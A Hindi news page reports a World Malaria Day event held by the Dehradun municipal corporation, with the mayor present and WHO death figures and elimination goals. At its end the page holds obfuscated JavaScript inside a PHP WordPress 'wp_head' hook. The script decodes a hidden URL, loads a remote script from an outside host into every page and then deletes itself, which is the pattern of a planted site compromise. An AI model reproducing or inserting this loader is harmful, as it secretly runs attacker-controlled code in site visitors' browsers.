Saturday, July 27, 2024
spot_img

हर साल विश्व भर में लाखों लोगों की होती है मलेरिया से मौत।

 देहरादून नगर निगम में विश्व मलेरिया दिवस मनाया गया, जिसमें मुख्य अतिथि के रूप में देहरादून मेयर सुनील उनियाल गामा ने शिरकत की,हर वर्ष 25 अप्रैल को विश्व मलेरिया दिवस मनाया जाता है यह दिन इस बात के लिए भी पहचाना जाता है कि मलेरिया के नियंत्रण हेतु किस प्रकार के वैश्विक प्रयास किए जा रहे हैं। मच्छरों के कारण फैलने वाली इस बीमारी में हर साल कई लाख लोग जान गंवा देते हैं। ‘प्रोटोजुअन प्लाज्मोडियम’ नामक कीटाणु मादा एनाफिलीज मच्छर के माध्यम से फैलते है।मलेरिया कभी दुनिया में महामारी के रूप में उभरकर सामने आया.था  लेकिन जैसे जैसे साइंस ने तरक्की की. मलेरिया उतना भयावह नहीं  रहा. हालांकि दुनिया के कई देशों में इलाज के अभाव में आज भी लोग मलेरिया की चपेट में आकर दम तोड़ रहे हैं. इस दिन का मकसद लोगों को मलेरिया के लक्षण, बचाव के प्रति अवेयर करना है. मलेरिया के जड़ से खात्मे को लेकर विश्व स्वास्थ्य संगठन खासा गंभीर है. इस बार विश्व मलेरिया दिवस को लेकर डब्ल्यूएचओ ने बड़ी बात कही है. डब्ल्यूएचओ ने मलेरिया से प्रभावित सभी देशों से आग्रह किया है कि विश्व मलेरिया दिवस 2023 पर मलेरिया से निपटने के लिए सभी देश एकजुट हो जाएं. मलेरिया को रोकने, जांच करने और इलाज के लिए हाई तकनीक वाले उपकरणों का प्रयोग करें. प्रत्येक व्यक्ति को मलेरिया के खतरे से अवेयर होना है।
वैश्विक आंकड़ों के अनुसार, वर्ष 2020 में विश्व में 6,25,000 लोगों की मलेरिया से मौत हो गई, जबकि वर्ष 2021 में यह आंकड़ा 6,19,000 रहा. इसी तरह साल दर साल मलेरिया से मौत होने के मामलों में अब कमी दर्ज की जा रही है.डब्ल्यूएचओ विश्व मलेरिया रिपोर्ट 2021 के अनुसार, भारत ने मलेरिया के मामलों में 1.7 प्रतिशत और वैश्विक स्तर पर 1.2 प्रतिशत मौतों का योगदान दिया. भारत का लक्ष्य 2030 तक मलेरिया को खत्म करना है. वहीं, विश्व स्वास्थ्य संगठन की भी कोशिश है कि दुनिया में मलेरिया को आने वाले समय में अंत के रूप में देखा जाए. वही देहरादून के मेयर सुनील उनियाल गामा का कहना है कि डेंगू से बचने के लिए सफाई का विशेष ध्यान रखें।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>